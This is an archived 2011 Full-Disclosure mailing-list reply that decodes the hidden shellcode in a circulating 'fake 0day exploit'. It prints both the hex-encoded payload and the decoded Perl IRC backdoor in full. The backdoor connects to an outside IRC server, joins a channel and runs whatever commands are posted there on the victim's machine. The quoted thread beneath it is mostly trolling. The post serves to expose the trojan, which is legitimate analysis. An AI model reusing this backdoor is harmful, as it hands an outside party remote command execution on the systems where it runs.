lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAKevSJ_2KyVbf_Aoc5ChHakcALgLtJOKgCzx-n5GS+WynKZ-XA@mail.gmail.com> Date: Wed, 26 Oct 2011 16:55:03 +1100 From: Flavio do Carmo Junior <carmo.flavio@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: Re: I know its old, but what the heck does this do... (exposing a tool...) sounds really useful... [waKKu@...5n ~]$ python -c 'hellcode=( "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63" > "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69" > "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72" > "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e" > "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65" > "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f" > "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49" > "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e" > "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22" > "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63" > "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d" > "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43" > "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68" > "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20" > "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64" > "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65" > "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d" > "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d" > "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20" > "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c" > "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22" > "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53" > "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20" > "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66" > "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20" > "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20" > "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f" > "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63" > "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68" > "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f" > "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e" > "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e" > "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28" > "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24" > "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d" > "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24" > "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24" > "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22" > "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22" > "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c" > "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d" > "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64" > "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"); print hellcode;' #!/usr/bin/perl $chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi [waKKu@...5n ~]$ print hellcode[764:];' /tmp/hi -- On 26 October 2011 13:49, xD 0x41 <secn3t@...il.com> wrote: > yer ofc... anyhow, ignoring you now... > > you obv think your some leet troll, your not, your ONLY a TROLL :) > have a nice day or is that > > *Goplamamamama Ignananayu* > > forget the jedi oky, you gotta brushup on ya troll trash talk! > bah hahaha. > fool > xd > > > On 26 October 2011 13:44, Antony widmal <antony.widmal@...il.com> wrote: >> >> Using your smartphone while flipping burger can be dangerous pandawan. >> More over if you work at burger king. >> >> >> >> On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 <secn3t@...il.com> wrote: >>> >>> h the idiot who thinks im laurelai... meh , your a fool yourself just for >>> even thinking that much :s >>> your but an echo on the list, wich, does not echo the rest of it, wich is >>> a good place to be. >>> unfortunately, your one of the few who should just be blocked, for making >>> absolutely nothing but abusive crap... >>> your an idiot. not me. >>> i dont run things, why, have you ran it ? >>> Is it good ? >>> hehe... maybe it is! >>> i guess if hes using it...well... >>> *sic* >>> >>> >>> >>> On 26 October 2011 13:21, Antony widmal <antony.widmal@...il.com> wrote: >>>> >>>> Do yourself a favor and run that code dumbass. >>>> >>>> On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 <secn3t@...il.com> wrote: >>>>> >>>>> I use darknets to help me, >>>>> they send me the info i need. >>>>> simple answer to simple question. >>>>> look them up, they may oneday protect you, also. >>>>> >>>>> >>>>> On 26 October 2011 13:15, adam <adam@...sy.net> wrote: >>>>>> >>>>>> http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code, >>>>>> claims to be a remote kernel root exploit) >>>>>> http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very >>>>>> similar code, claims to be an IIS exploit) >>>>>> http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire >>>>>> thread, code is mentioned though) >>>>>> I'm sure there's more, but this kinda reminds me of that leaked >>>>>> "private exploit" on pastebin a few weeks back (you know, the one that was >>>>>> nice enough to create a _local_ root account), and insisted that it was >>>>>> private private private and specifically said NOT to leak it. >>>>>> I am curious as to how you're so certain that it's on "many many >>>>>> boxes" yet know next to nothing about it. >>>>>> On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 <secn3t@...il.com> wrote: >>>>>>> >>>>>>> Hello List, >>>>>>> Id like people to also, like this thread asks, to pls give some >>>>>>> opinion, other than mine.. wich, i am yet to make; >>>>>>> >>>>>>> http://www.hackerthreads.org/Topic-5973 >>>>>>> >>>>>>> Please look at this .c code on here, if you wish, and tell me, why >>>>>>> A. It is still in circulation, seeminlgly, on MANY MANY boxes.... >>>>>>> B. people still seem to try keep it private :s >>>>>>> >>>>>>> This morning, a friend from webhostingtalk.com ,asked me to take a >>>>>>> look. >>>>>>> I have and, i can only sofar say, once i decrypt the shellcode, ill >>>>>>> know abit more.. >>>>>>> altho , i rmember this thing, and, somany people were after it, >>>>>>> people were paying for it, this is first time i have seen it actually >>>>>>> disclosed tho, >>>>>>> admittedly only looked today. >>>>>>> If skiddies are using it to ddos things, I want to makesure i can >>>>>>> expose it, and kill the threats. >>>>>>> thankyou. >>>>>>> xd .// exposing bullshit as i ride! >>>>>>> >>>>>>> >>>>>>> _______________________________________________ >>>>>>> Full-Disclosure - We believe in it. >>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>>>>>> Hosted and sponsored by Secunia - http://secunia.com/ >>>>>> >>>>> >>>>> >>>>> _______________________________________________ >>>>> Full-Disclosure - We believe in it. >>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>>>> Hosted and sponsored by Secunia - http://secunia.com/ >>>> >>> >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- -- Best regards, Flávio do Carmo Júnior Sydney/NSW http://au.linkedin.com/in/carmoflavio/en http://0xcd80.wordpress.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists